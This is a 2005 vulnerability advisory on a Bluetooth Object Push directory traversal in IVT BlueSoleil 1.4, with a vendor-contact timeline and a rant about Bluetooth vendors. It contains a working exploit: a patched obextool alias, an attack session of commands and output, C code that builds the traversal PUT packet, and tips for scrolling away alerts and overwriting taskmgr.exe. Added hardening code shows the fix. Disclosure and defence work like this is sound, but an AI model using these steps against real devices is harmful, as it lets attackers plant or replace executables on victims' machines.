DMA[2005-0401a] - 'IVT BlueSoleil Directory Traversal'

Author: Kevin Finisterre
Vendor: http://www.bluesoleil.com/products/index.asp, 
http://www.ivtcorporation.com/
Product: 'IVT BlueSoleil 1.4'
References: http://www.digitalmunition.com/DMA[2005-0103a].txt

Description:
90% of the USB Bluetooth dongles you find on the market will come with drivers
from Widcomm. Out of the 7 dongles I own only one does not use some flavor of
Widcomm. My SMC Networks SMC-BT10 came with IVT BlueSoleil 1.4 software.

BlueSoleil for Windows is a set of Bluetooth Application Profiles implemented on
the Windows platform. BlueSoleil is fully compliant with the Bluetooth SIG's
latest specifications. It can enable PCs to form networks and exchange
information wirelessly. It can also provide PCs a fast and reliable solution for
effortless wireless connections to mobile phones, headsets, PDAs, Access Points,
Printers, Digital Cameras, PC peripherals, etc. BlueSoleil supports more than
ten Bluetooth chip-sets and different HCI interfaces which include USB, UART,
PCMCIA and Compact Flash.

My BlueSoleil install was performed on a Windows XP SP2 machine using the above
mentioned SMC-BT10. I chose all program defaults during the install. Upon
rebooting my machine the "Welcome to Bluetooth" screen was displayed and I was
asked for a device name and type. I was told that my security level was set to
'Medium' and that other devices must provide a Bluetooth passkey before
connecting with my computer. I was given the option to disable this security
authentication by simply unchecking a box and clicking OK to continue. My PDA
can be picky about using a passkey so I did go with 'Low' security. The
BlueSoleil website mentioned that 'some old dongles may not support some
operations' when dealing with the key functions. This behavior could obviously
prompt other users to set security to 'Low'.

Regardless of the security setting you should know that it is possible for an
attacker to take advantage of at least one vulnerability in the IVT software.
All of my testing was done on Version PTP-1.4.9-Win2k/XP-04.08.27 with Stack
Version 04.03.11.20040827. I cannot vouch for the behavior of any other
versions of BlueSoleil. Even connections that make use of PINs are vulnerable.

By default the Object Push Service is auto-started when BlueSoleil is opened.
Any files that are pushed to the device should show up in whichever directory
the user specified during configuration. The default is
C:\Documents and Settings\<username>\My Documents\Bluetooth\inbox

The name the file is stored under is the one supplied by the sending device,
and BlueSoleil does not strip path separators or '..' from it before joining it
to that directory. That is what the traversal below abuses.

In order to exploit this issue all we need is a modified obextool.c from
ussp-push-0.2. The alias variable is the name the receiving side is told to
store the object under (it is sent as the OBEX Name header):

@@ -316,7 +316,7 @@
        }

        filename = argv[1];
-       alias = basename(filename);
+       alias = "../../../../../../../../mal.exe";
        str2ba(argv[2], &bdaddr);
        channel = (argc > 3) ? atoi(argv[3]) : 10;
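Review bot: the `+` line hard-codes both the number of `../` components and the target file name, so the taskmgr.exe variant described further down needs a recompile; reading the alias from an optional argv slot and falling back to `basename(filename)` when none is given would keep `push <file> <bdaddr> [channel]` usable for ordinary transfers as well. Note also that the literal carries eight `../` while the victim-side "An object ... is received" message shows seven: both work because the default inbox (C:\Documents and Settings\<username>\My Documents\Bluetooth\inbox) sits five directories below the drive root and Windows absorbs surplus `..` at the root, so five is the minimum and extra components are harmless.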

You obviously need a working Bluetooth dongle on your machine. First scan for a
device that *may* be running BlueSoleil. Archiving a list of known dongles that
come with the install media would obviously be a good idea for future attacks.
In the example below the machine 'jdam' is attacking 'threat-win32'.

Scan for the machine. 
jdam:~# hcitool scan
Scanning ...
        00:11:B1:07:BE:A7       threat-win32

Verify that the Object Push service exists. 

jdam:/tmp/ussp-push-0.2# sdptool search OPUSH 00:11:B1:07:BE:A7
Inquiring ...
Searching for OPUSH on 00:11:B1:07:BE:A7 ...
Service Name: OPP Server
Service RecHandle: 0x10005
Service Class ID List:
  "OBEX Object Push" (0x1105)
Protocol Descriptor List:
  "L2CAP" (0x0100)
  "RFCOMM" (0x0003)
    Channel: 4
  "OBEX" (0x0008)
Language Base Attr List:
  code_ISO639: 0x656e
  encoding:    0x6a
  base_offset: 0x100
Profile Descriptor List:
  "OBEX Object Push" (0x1105)
    Version: 0x0100

Break out your modified obextool binary. Make use of the Channel listed in the
sdptool output. 

jdam:/tmp/ussp-push-0.2# ./obextool
Bluetooth OBEX tool
Usage:
        obextool [options] <command>
Options:
        -i [hciX|bdaddr]   Local HCI device or BD Address
        -h, --help         Display help
Commands:
        push   <file> <bdaddr> [channel]        Push a file

Pick your binary and send away! 

jdam:/tmp/ussp-push-0.2# ./obextool push calc.exe 00:11:B1:07:BE:A7 4
Sending object ...
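To see what obextool actually puts on the RFCOMM channel once the OBEX CONNECT
exchange (omitted here) is done, the following is an added example, written for
this page and not taken from the advisory, ussp-push or IVT: it builds the
single-packet OBEX PUT that carries the traversal string in the Name header
(null-terminated UTF-16BE, per the OBEX spec) and then parses it back the way a
receiving Object Push server would. The object body is a constructed stand-in
for mal.exe.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* OBEX opcode and header identifiers (IrOBEX, as used by Bluetooth GOEP/OPP). */
#define OBEX_OP_PUT_FINAL 0x82   /* PUT with the final bit set: whole object in one packet */
#define OBEX_HI_NAME      0x01   /* Name: null-terminated UTF-16BE string */
#define OBEX_HI_LENGTH    0xC3   /* Length: 4-byte object size */
#define OBEX_HI_END_BODY  0x49   /* End-of-Body: last chunk of object data */

static void put_be16(uint8_t *p, uint16_t v) { p[0] = (uint8_t)(v >> 8); p[1] = (uint8_t)v; }
static uint16_t get_be16(const uint8_t *p) { return (uint16_t)((p[0] << 8) | p[1]); }

/* Client side: build one PUT packet with `name` (ASCII) as the Name header and
 * `body` as End-of-Body. Returns the packet length, or 0 if `out` is too small. */
size_t obex_put_build(const char *name, const uint8_t *body, size_t body_len,
                      uint8_t *out, size_t out_cap)
{
    size_t nlen = strlen(name);
    size_t name_hdr = 3 + 2 * nlen + 2;      /* HI + HL + UTF-16BE chars + U+0000 */
    size_t body_hdr = 3 + body_len;          /* HI + HL + raw bytes */
    size_t total = 3 + name_hdr + 5 + body_hdr;
    if (total > 0xffff || total > out_cap) return 0;

    uint8_t *p = out;
    *p++ = OBEX_OP_PUT_FINAL;
    put_be16(p, (uint16_t)total); p += 2;

    *p++ = OBEX_HI_NAME;                     /* the traversal string rides here */
    put_be16(p, (uint16_t)name_hdr); p += 2;
    for (size_t i = 0; i < nlen; i++) { *p++ = 0x00; *p++ = (uint8_t)name[i]; }
    *p++ = 0x00; *p++ = 0x00;

    *p++ = OBEX_HI_LENGTH;
    *p++ = (uint8_t)(body_len >> 24); *p++ = (uint8_t)(body_len >> 16);
    *p++ = (uint8_t)(body_len >> 8);  *p++ = (uint8_t)body_len;

    *p++ = OBEX_HI_END_BODY;
    put_be16(p, (uint16_t)body_hdr); p += 2;
    memcpy(p, body, body_len); p += body_len;
    return (size_t)(p - out);
}

/* Server side: walk the headers of a PUT packet and decode the Name header to
 * ASCII. Returns 0 on success, -1 if it is missing, malformed, contains an
 * embedded NUL, or holds characters outside printable ASCII. */
int obex_put_name(const uint8_t *pkt, size_t pkt_len, char *name_out, size_t cap)
{
    if (pkt_len < 3 || get_be16(pkt + 1) != pkt_len) return -1;
    size_t off = 3;
    while (off < pkt_len) {
        uint8_t hi = pkt[off];
        size_t hlen;
        switch (hi >> 6) {                   /* top two bits give the header's encoding */
        case 0: case 1:                      /* unicode / byte sequence: 2-byte length */
            if (off + 3 > pkt_len) return -1;
            hlen = get_be16(pkt + off + 1);
            if (hlen < 3) return -1;
            break;
        case 2:  hlen = 2; break;            /* 1-byte value */
        default: hlen = 5; break;            /* 4-byte value */
        }
        if (off + hlen > pkt_len) return -1;
        if (hi == OBEX_HI_NAME) {
            const uint8_t *s = pkt + off + 3;
            size_t units = (hlen - 3) / 2, j = 0;
            if ((hlen - 3) % 2 || units == 0 || units > cap) return -1;
            for (size_t i = 0; i + 1 < units; i++) {
                if (s[2*i] != 0 || s[2*i+1] < 0x20 || s[2*i+1] > 0x7e) return -1;
                name_out[j++] = (char)s[2*i+1];
            }
            if (s[2*(units-1)] || s[2*(units-1)+1]) return -1;   /* must end in U+0000 */
            name_out[j] = '\0';
            return 0;
        }
        off += hlen;
    }
    return -1;
}

int main(void)
{
    static const uint8_t payload[] = "MZ-constructed-stand-in-for-mal.exe";  /* constructed */
    uint8_t pkt[256]; char name[128];
    size_t n = obex_put_build("../../../../../../../../mal.exe", payload,
                              sizeof payload - 1, pkt, sizeof pkt);
    if (n && obex_put_name(pkt, n, name, sizeof name) == 0)
        printf("%zu-byte PUT, receiver will store the object as \"%s\"\n", n, name);
    return 0;
}
```

The parser is deliberately strict about the terminator and about embedded
U+0000 code units: a Name header whose UTF-16 string contains a NUL before the
end would be truncated by any C string handling on the receiving side, which is
a second way for the stored name to differ from what the log shows.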

For about 10 seconds the following messages are visible on the screen of the
attacked device. The window only stores 3 messages however so it's really easy
to make them scroll by with some fake business card requests.

* Remote device (00:20:E0:4C:CF:DF) has connected to my Object Push service!
* An object ../../../../../../../mal.exe is received.
* Remove Device (00:20:E0:4C:CF:DF) has disconnected from my Object Push service!

jdam:/tmp/bt-tools# ~/qobexclient -t bluetooth -d 00:11:B1:07:BE:A7 -g anything.vcf

* Remote device (00:20:E0:4C:CF:DF) has connected to my Object Push service!
* Your Business card is sent on remote user's request.
* Remove Device (00:20:E0:4C:CF:DF) has disconnected from my Object Push service!

After the attack, rather than being bound to the Bluetooth\inbox directory, the
binary is placed pretty much anywhere on the filesystem we want it:

C:\>dir mal.exe
 Volume in drive C has no label.
 Volume Serial Number is F888-ED9A

 Directory of C:\

07/01/2005  09:28 PM           114,688 mal.exe
               1 File(s)        114,688 bytes
               0 Dir(s)  38,813,556,736 bytes free

Plenty of other variations are available and some may depend on the user that
is logged into the system (the default inbox path includes the username, and
which directories are writable varies with that user's rights).

You can obviously be creative and use anything that you think either the user
or the system may run. alias = "../../../../../../../WINDOWS/System32/taskmgr.exe";
works real well, especially if the user misses the really obvious message on
their console because you made it scroll by. Paranoid users tend to break out
Task Manager pretty quick when something sketchy happens. Then again perhaps a
paranoid user would not have his Bluetooth wide open?
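The defect is on the receiving side: the sender's object name is used as a file
name without inspection. The following added example (written for this page; a
model of the behaviour observed above, not IVT's code) contrasts a naive join of
inbox + name, resolved the way Windows normalises '.' and '..' in a drive-letter
path, against a hardened version that refuses anything other than a bare file
name and then independently re-checks the resolved path against the inbox. The
inbox path and the username 'kf' are assumptions.

```c
#include <ctype.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Resolve "." and ".." in a drive-letter path the way Windows normalises it:
 * ".." at the root is absorbed rather than an error, so surplus "../" segments
 * in a traversal string cost the attacker nothing. '/' and '\' both separate. */
int win_normalize(const char *path, char *out, size_t cap)
{
    if (!isalpha((unsigned char)path[0]) || path[1] != ':') return -1;
    const char *segs[64]; size_t lens[64]; size_t depth = 0;
    const char *p = path + 2;
    while (*p) {
        while (*p == '\\' || *p == '/') p++;
        if (!*p) break;
        const char *s = p;
        while (*p && *p != '\\' && *p != '/') p++;
        size_t n = (size_t)(p - s);
        if (n == 1 && s[0] == '.') continue;
        if (n == 2 && s[0] == '.' && s[1] == '.') { if (depth) depth--; continue; }
        if (depth == 64) return -1;
        segs[depth] = s; lens[depth] = n; depth++;
    }
    size_t used = 0;
    if (cap < 4) return -1;
    out[used++] = path[0]; out[used++] = ':';
    for (size_t i = 0; i < depth; i++) {
        if (used + 1 + lens[i] + 1 > cap) return -1;
        out[used++] = '\\';
        memcpy(out + used, segs[i], lens[i]); used += lens[i];
    }
    if (depth == 0) out[used++] = '\\';          /* bare root: "C:\" */
    out[used] = '\0';
    return 0;
}

/* Model of the behaviour the advisory describes: the sender's object name is
 * appended to the inbox directory unchecked (illustrative; not IVT's code). */
int inbox_path_naive(const char *inbox, const char *name, char *out, size_t cap)
{
    char joined[1024];
    if (snprintf(joined, sizeof joined, "%s\\%s", inbox, name) >= (int)sizeof joined) return -1;
    return win_normalize(joined, out, cap);
}

/* Hardened variant: accept only a bare file name, refusing anything that could
 * steer the write out of the inbox (separators, drive colon, ".", "..", control
 * characters, empty). Then independently verify the resolved path still sits
 * directly under the normalised inbox. Both checks must pass. */
int inbox_path_safe(const char *inbox, const char *name, char *out, size_t cap)
{
    size_t n = strlen(name);
    if (n == 0 || n > 255 || !strcmp(name, ".") || !strcmp(name, "..")) return -1;
    for (size_t i = 0; i < n; i++) {
        unsigned char c = (unsigned char)name[i];
        if (c == '/' || c == '\\' || c == ':' || c < 0x20 || c == 0x7f) return -1;
    }
    char base[1024];
    if (win_normalize(inbox, base, sizeof base) != 0) return -1;
    if (inbox_path_naive(inbox, name, out, cap) != 0) return -1;
    size_t bl = strlen(base);
    if (strncmp(out, base, bl) != 0 || out[bl] != '\\' || strchr(out + bl + 1, '\\')) return -1;
    return 0;
}

int main(void)
{
    const char *inbox = "C:\\Documents and Settings\\kf\\My Documents\\Bluetooth\\inbox"; /* assumed */
    const char *names[] = { "calc.exe", "../../../../../../../../mal.exe",
                            "../../../../../../../WINDOWS/System32/taskmgr.exe" };
    char out[1024];
    for (size_t i = 0; i < 3; i++) {
        if (inbox_path_naive(inbox, names[i], out, sizeof out) == 0)
            printf("naive : %-52s -> %s\n", names[i], out);
        printf("safe  : %-52s -> %s\n", names[i],
               inbox_path_safe(inbox, names[i], out, sizeof out) == 0 ? out : "REJECTED");
    }
    return 0;
}
```

Run stand-alone it shows the eight-level string resolving to C:\mal.exe and the
seven-level one to C:\WINDOWS\System32\taskmgr.exe, matching the dir listing
above, while the hardened path rejects both and passes only calc.exe. The
allow-list on the name is the real fix; the prefix comparison afterwards is a
belt-and-braces check so that a future change to the join logic cannot silently
reopen the hole.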

I attempted to test IVT BlueSoleil for WinCE however it would not run on my
device so I cannot verify the behavior there.

I contacted the BlueSoleil staff multiple times after our initial exchange and
for some reason all attempts at contact resulted in zero answer. The initial
response was so prompt I was surprised no one attempted to contact me further
after multiple attempts on my part.

<rant>
Due to the fact that Bluetooth vendors are acting weird right now I don't even
feel like playing the typical game that goes on in the disclosure process. A
perfect example of this 'weirdness' can be found with Widcomm / Broadcom and the
issues that pentest_co_uk partially disclosed last year. 90% of the Bluetooth
dongles you can buy in the store are vulnerable to attack and the end user is
totally in the dark about it. Because of half-assed disclosure and most likely
some political BS I would estimate that LOADS of Bluetooth devices can be
attacked. Good luck getting a software update for your Widcomm product; although
new drivers are available the license.dat will give your dongle NO love. Some
folks have even gone to the extreme of patching Widcomm's licensing software
just so they could use an update, they were however quickly smacked down:
http://www.wifi-forum.com/wf/archive/index.php/t-6631.html

Both version 3 (the one supposed to patch pentest_co_uk's issues) and version 4
are out but chances are you are still vulnerable because you can't install the
software. I hear you can bitch at some vendors enough that they will send you a
new dongle that is licensed for newer software. I also hear it's about like
pulling teeth. Have you got a PDA? heh good luck. hrmm what was that line
again, '...(we) recommend that end users stop using the vulnerable WIDCOMM
Bluetooth software'. Alternately users can 'set their Bluetooth device
configuration to be non-discoverable or hidden.'. Please note however 'This
will not stop the device from being vulnerable but it may limit the exposure.'

If you use Bluetooth try to educate yourself about the software you are using
and hound your vendor for patches!
</rant>

All your Bluetooth are belong to greenplaque. 

Timeline associated with this bug:
03/24/2005 Prompt and immediate response from support@xxxxxxxxxxxxxx inquiring
           about the bug.
03/24/2005 Object Push vulnerability disclosed to BlueSoleil Support with
           request for follow up.
03/28/2005 Request for an update and vendor confirmation of the bug.
03/29/2005 Secondary ping for an update... surprised I did not get the same
           prompt response.
03/30/2005 Final ping and attempt to make sure the bug was understood by
           BlueSoleil staff.
03/31/2005 Message indicating disclosure based on lack of communication
           surrounding the issue.

Workaround:
'...(we) recommend that end users stop using the vulnerable BLUESOLEIL Bluetooth
software'. Alternately users can 'set their Bluetooth device configuration to be
non-discoverable or hidden.'. Please note however 'This will not stop the device
from being vulnerable but it may limit the exposure.'

Short of the prompt response I got on the first day NO other attempts at
communication were made by BlueSoleil staff.

Other vendors are affected by similar issues and future advisories will be
released.

-KF 
